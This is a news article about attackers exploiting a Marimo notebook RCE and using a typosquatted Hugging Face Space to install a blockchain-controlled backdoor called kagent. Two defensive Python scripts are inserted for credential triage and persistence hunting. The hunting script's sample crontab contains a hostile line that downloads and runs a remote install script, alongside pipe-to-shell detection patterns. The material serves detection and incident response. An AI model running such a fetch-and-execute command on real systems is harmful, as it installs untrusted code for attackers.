
Netcrook



AI’s Trusted Gatekeeper Compromised: Hugging Face Used as Stealth Launchpad for Blockchain-Powered Malware

Published: 18 April 2026 05:02
Category: Technology, Innovation & Digital Infrastructure
Author: TRUSTBREAKER

Subtitle: A critical Marimo notebook flaw enables attackers to hijack AI developer environments and deploy undetectable backdoors via Hugging Face Spaces.

When AI’s most trusted tools become the very weapon used against their creators, the stakes for the digital frontier escalate overnight. In mid-April 2026, cybercriminals moved with breathtaking speed to exploit a newly disclosed vulnerability in Marimo, a popular Python notebook platform for AI/ML development. Within hours, trusted Hugging Face Spaces, long considered a safe haven for developers, were repurposed as malware launchpads, unleashing a sophisticated blockchain-powered backdoor into some of the world’s most sensitive cloud environments.

The attack chain began with CVE-2026-39987, a remote code execution (RCE) vulnerability in Marimo that allowed unauthenticated attackers to run arbitrary commands on exposed instances, with no login required. The flaw’s public disclosure on GitHub triggered a global race: within 10 hours, threat actors pivoted to exploitation, with Sysdig’s Threat Research Team logging hundreds of attacks from over a dozen countries in just three days.

Once inside, adversaries wasted no time. Their playbook was methodical: scrape environment variables to harvest AWS keys, OpenAI tokens, and database URLs; attempt reverse shells across multiple protocols; and, failing that, leverage stolen credentials to burrow further into backend systems like PostgreSQL and Redis. Even when outbound connections were blocked, attackers used clever DNS callbacks to confirm their foothold.
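The harvesting step above is what makes the first minutes of incident response painful: whatever sat in the notebook process’s environment is now in the attacker’s hands. The triage helper below, added here as an illustration and not code from the article or Sysdig, takes the environment a compromised Marimo process ran with and answers two questions a responder needs for rotation: which variables a dump of `os.environ` exposed, grouped by what they unlock, and which backends (PostgreSQL, Redis and the like) a leaked connection URL reaches with a ready-made password. The name patterns, the `URL_SCHEMES` set and the sample environment are constructed.

```python
"""Post-compromise triage for harvested environment variables.

Added illustration, not code from the article or Sysdig. The variable-name
patterns, the URL scheme list and SAMPLE_ENV are constructed assumptions.
"""
import re
from urllib.parse import urlsplit

# Patterns for the secret types the article says were harvested (AWS keys,
# OpenAI tokens, database URLs) plus a generic catch-all. Constructed.
SECRET_PATTERNS = {
    "aws": re.compile(r"^AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)$"),
    "openai": re.compile(r"^OPENAI_API_KEY$"),
    "database": re.compile(r"^(DATABASE_URL|PG(PASSWORD|URI)|REDIS_URL)$"),
    "huggingface": re.compile(r"^(HF_TOKEN|HUGGING_FACE_HUB_TOKEN)$"),
    "generic": re.compile(r"SECRET|TOKEN|PASSWORD|API_KEY", re.IGNORECASE),
}
# Connection-URL schemes worth reporting as reachable backends. Constructed.
URL_SCHEMES = {"postgres", "postgresql", "redis", "rediss", "mysql", "mongodb"}


def classify_env(env: dict) -> dict:
    """Map category -> sorted names of the variables a dump of this environment exposes."""
    exposed: dict = {}
    for name in env:
        for category, pattern in SECRET_PATTERNS.items():
            if pattern.search(name):
                exposed.setdefault(category, []).append(name)
                break  # first match wins; specific categories are listed before the generic one
    return {k: sorted(v) for k, v in exposed.items()}


def reachable_backends(env: dict) -> list:
    """Report (var, scheme, host, embeds_password) for each connection URL in the environment.

    The secret itself is never echoed. A URL that embeds a password is a complete
    login for that backend, which is how a stolen environment turns into access to
    PostgreSQL or Redis.
    """
    backends = []
    for name, value in env.items():
        try:
            parts = urlsplit(value)
        except ValueError:  # malformed value (e.g. bad IPv6 bracket); not a URL we can assess
            continue
        if parts.scheme.lower() in URL_SCHEMES and parts.hostname:
            backends.append((name, parts.scheme, parts.hostname, parts.password is not None))
    return sorted(backends)


# Constructed sample environment; every value is a placeholder, not a real credential.
SAMPLE_ENV = {
    "PATH": "/usr/local/bin:/usr/bin",
    "HOME": "/home/dev",
    "AWS_ACCESS_KEY_ID": "AKIA_EXAMPLE_PLACEHOLDER",
    "AWS_SECRET_ACCESS_KEY": "EXAMPLE_SECRET_PLACEHOLDER",
    "OPENAI_API_KEY": "sk-EXAMPLE_PLACEHOLDER",
    "DATABASE_URL": "postgres://app:EXAMPLE_PW@db.internal:5432/prod",
    "REDIS_URL": "redis://cache.internal:6379/0",
    "SLACK_WEBHOOK_TOKEN": "EXAMPLE_PLACEHOLDER",
}


def triage(env: dict = SAMPLE_ENV) -> dict:
    """Combine both views into the rotation worklist a responder would start from."""
    return {"exposed": classify_env(env), "backends": reachable_backends(env)}


if __name__ == "__main__":
    result = triage()
    for category, names in result["exposed"].items():
        print(f"rotate [{category}]: {', '.join(names)}")
    for var, scheme, host, has_pw in result["backends"]:
        print(f"backend via {var}: {scheme}://{host} embedded password={has_pw}")
```

Run it against a real dump with `triage(dict(os.environ))`; the point of grouping is that AWS and OpenAI credentials are rotated at the provider, while a connection URL with an embedded password means the backend’s own credentials and its exposure to the compromised network segment both need attention.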

The campaign’s centerpiece was a cunning twist: a Hugging Face Space named “vsccode-modetx” (a misspelling of “VS Code”) hosted a malicious shell script disguised as a legitimate tool installer. This script silently dropped “kagent,” a Go-based binary masquerading as a Kubernetes AI agent. The malware established persistence through systemd, crontab, or macOS LaunchAgents, blending seamlessly into developer workstations.

What set this attack apart was kagent’s use of the NKN blockchain for command-and-control (C2). Unlike traditional malware that phones home to a known server, this backdoor communicated across a decentralized blockchain network, making it nearly impossible for defenders to block or trace. By riding on the clean reputation of Hugging Face’s infrastructure, attackers sidestepped many standard security controls, echoing tactics seen in previous Android RAT campaigns but now adapted for the AI/ML ecosystem.

The implications are sobering: AI developer environments often contain the keys to the cloud kingdom: credentials, tokens, and access to sensitive data pipelines. A persistent backdoor here doesn’t just threaten a single workstation; it risks cascading compromise across entire cloud-native infrastructures.

As the dust settles, defenders are urged to patch Marimo instances immediately, restrict access, and scrutinize any downloads or scripts referencing suspicious Hugging Face Spaces. The lesson is clear: in the age of AI, even the most trusted platforms can become unwitting accomplices. Blind trust is no longer an option; vigilance and layered defenses are now mandatory for every organization building on the bleeding edge.
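Two of the article’s concrete details translate directly into a hunt: the persistence locations kagent used (systemd, crontab, macOS LaunchAgents) and the “installer script pulled from a Hugging Face Space” delivery pattern. The script below, added here as an illustration and not tooling from the article, Sysdig or Hugging Face, parses each of those three persistence formats, extracts the command actually executed, and flags it when it launches a known-bad binary, fetches from any Hugging Face Space, or pipes a download straight into a shell. The indicator names “kagent” and “vsccode-modetx” come from the article; the Space owner “someuser” and all sample unit, crontab and plist text are constructed.

```python
"""Hunt persistence entries for the footprints the article describes.

Added illustration, not tooling from the article, Sysdig or Hugging Face.
"kagent" and "vsccode-modetx" are indicators named in the article; the Space
owner "someuser" and every sample artifact below are constructed.
"""
import plistlib
import re

KNOWN_BAD_BINARIES = {"kagent"}        # from the article
KNOWN_BAD_SPACES = {"vsccode-modetx"}  # from the article

# Spaces host demos, not software installers, so any Space URL in a persistence
# entry deserves a look even when its name is not on a blocklist.
SPACE_URL = re.compile(r"https?://huggingface\.co/spaces/([\w.-]+)/([\w.-]+)", re.IGNORECASE)
# "download | sh": the installer-script delivery the article describes.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# Either "@reboot"-style or the five standard schedule fields, followed by the command.
CRON_SCHEDULE = re.compile(r"^(@\w+|(?:\S+\s+){5})")


def assess_command(cmd: str) -> list:
    """Reasons a persistence command looks suspicious; an empty list means nothing flagged."""
    reasons = []
    for token in re.split(r"[\s'\"]+", cmd):
        if token.rsplit("/", 1)[-1] in KNOWN_BAD_BINARIES:
            reasons.append(f"launches known-bad binary '{token}'")
    for m in SPACE_URL.finditer(cmd):
        owner, space = m.group(1), m.group(2)
        tag = "known-bad" if space.lower() in KNOWN_BAD_SPACES else "unexpected"
        reasons.append(f"fetches from {tag} Hugging Face Space {owner}/{space}")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes a download straight into a shell")
    return reasons


def scan_systemd_unit(name: str, text: str) -> list:
    """Check the Exec* directives of one unit file."""
    findings = []
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip() in {"ExecStart", "ExecStartPre", "ExecStartPost"}:
            findings += [(f"systemd:{name}", r) for r in assess_command(value.strip())]
    return findings


def scan_crontab(owner: str, text: str) -> list:
    """Check every scheduled command in a crontab, skipping comments and VAR=value lines."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_SCHEDULE.match(line)
        if m:
            findings += [(f"crontab:{owner}", r) for r in assess_command(line[m.end():])]
    return findings


def scan_launchagent(path: str, plist_bytes: bytes) -> list:
    """Check what a LaunchAgent plist executes (ProgramArguments, else Program)."""
    data = plistlib.loads(plist_bytes)
    argv = data.get("ProgramArguments") or [data.get("Program", "")]
    return [(f"launchagent:{path}", r) for r in assess_command(" ".join(argv))]


# Constructed sample artifacts, not recovered from any real incident.
SAMPLE_UNIT = """[Unit]
Description=Kubernetes AI Agent
[Service]
ExecStart=/usr/local/bin/kagent --daemon
Restart=always
[Install]
WantedBy=multi-user.target
"""
BENIGN_UNIT = "[Service]\nExecStart=/usr/sbin/sshd -D\n"
SAMPLE_CRONTAB = """PATH=/usr/local/bin:/usr/bin
# nightly backup
0 2 * * * /opt/backup/run.sh
@reboot curl -fsSL https://huggingface.co/spaces/someuser/vsccode-modetx/resolve/main/install.sh | sh
"""
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key><array><string>/Users/dev/.local/kagent</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""


def hunt() -> list:
    """Run every scanner over the sample artifacts and return (location, reason) pairs."""
    findings = []
    findings += scan_systemd_unit("kagent.service", SAMPLE_UNIT)
    findings += scan_systemd_unit("ssh.service", BENIGN_UNIT)
    findings += scan_crontab("dev", SAMPLE_CRONTAB)
    findings += scan_launchagent("~/Library/LaunchAgents/com.example.agent.plist", SAMPLE_PLIST)
    return findings


if __name__ == "__main__":
    for location, reason in hunt():
        print(f"{location}: {reason}")
```

On a live host the same scanners would be fed the contents of `/etc/systemd/system`, `~/.config/systemd/user`, each user’s crontab and `~/Library/LaunchAgents`; the blocklist catches this campaign’s names, while the Space-URL and pipe-to-shell checks are the generic part that survives a rename of the binary or the Space.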

WIKICROOK

  • Remote Code Execution (RCE): Remote Code Execution (RCE) is when an attacker runs their own code on a victim’s system, often leading to full control or compromise of that system.
  • Persistence: Persistence involves techniques used by malware to survive reboots and stay hidden on systems, often by mimicking legitimate processes or updates.
  • Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
  • Typosquatting: Typosquatting is when attackers use lookalike names of trusted sites or software to trick users into visiting fake sites or downloading malware.
  • Environment Variables: Environment variables are named settings in a process’s environment that programs and servers read at runtime; they frequently hold sensitive values such as passwords, API keys, and database connection strings.